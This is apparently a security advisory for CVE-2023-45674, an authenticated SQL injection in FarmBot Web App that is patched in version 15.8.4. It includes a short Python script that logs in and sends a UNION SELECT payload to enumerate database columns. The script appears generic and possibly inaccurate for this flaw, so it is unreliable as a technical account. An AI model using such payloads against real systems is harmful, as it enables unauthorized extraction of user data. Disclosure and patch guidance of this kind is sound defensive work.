Farmbot-Web-App, the web control interface for the popular Farmbot farm automation platform, has been found to have an SQL injection vulnerability. This vulnerability may potentially allow an authenticated attacker to extract arbitrary data from its database, including the user table, leading to information disclosure. FarmBot has since patched this issue in version 15.8.4. Users are strongly advised to upgrade their FarmBot Web App installations to this patched version. There are no known workarounds for this issue.

Vulnerability Details

An authenticated attacker with access to the FarmBot Web App can inject specially crafted SQL queries through the affected parameters, causing the application to return information stored in its database. By exploiting this vulnerability, which has been identified as CVE-2023-45674, an attacker could gain access to sensitive information, such as usernames, email addresses, and potentially hashed user passwords.

Example Code Snippet:

import requests

url = "https://target.com/farmbot-api/users"; # Replace "target.com" with the actual target URL
userName = "attacker" # Replace with attacker's username
password = "attackerpassword" # Replace with attacker's password
data = {"user[email]": userName, "user[password]": password}

session = requests.Session()
session.post(url, data=data)

sqlInjectionPayload = "1' UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_schema='user_accounts' --"
vulnerableUrl = f"https://target.com/farmbot-api/users/{sqlInjectionPayload}";

response = session.get(vulnerableUrl)

print(response.text)

This vulnerability affects FarmBot Web App versions prior to 15.8.4. Ensure your web app installation is updated to version 15.8.4 or later to patch this issue.

References

FarmBot Web App official GitHub repository: https://github.com/FarmBot/Farmbot-Web-App

FarmBot Web App Changelog - (v15.8.4 security patch): https://github.com/FarmBot/Farmbot-Web-App/releases/tag/v15.8.4

NVD - National Vulnerability Database - CVE-2023-45674 Entry: https://nvd.nist.gov/vuln/detail/CVE-2023-45674

Exploit Details and Mitigation

Currently, there are no known workarounds for this issue. To protect your FarmBot Web App installation from potential exploits, it is crucial to update your instance to version 15.8.4 or later.

To upgrade your FarmBot Web App installation, follow these steps

1. Visit the FarmBot Web App GitHub repository: https://github.com/FarmBot/Farmbot-Web-App

Follow the provided instructions for updating your instance.

Make sure you educate your users about the risks associated with sharing credentials and the importance of using strong and unique passwords for their FarmBot accounts. It is also advisable to limit user access to only the necessary permissions and closely monitor your FarmBot Web App logs for any suspicious activity.

It is essential to stay up to date on security patches and updates for all software to ensure the highest level of protection against vulnerabilities. Additionally, consider working with vulnerability scanners and application firewalls to safeguard your web-based applications from potential threats.

Timeline

Published on: 10/14/2023 00:15:10 UTC
Last modified on: 10/18/2023 20:55:55 UTC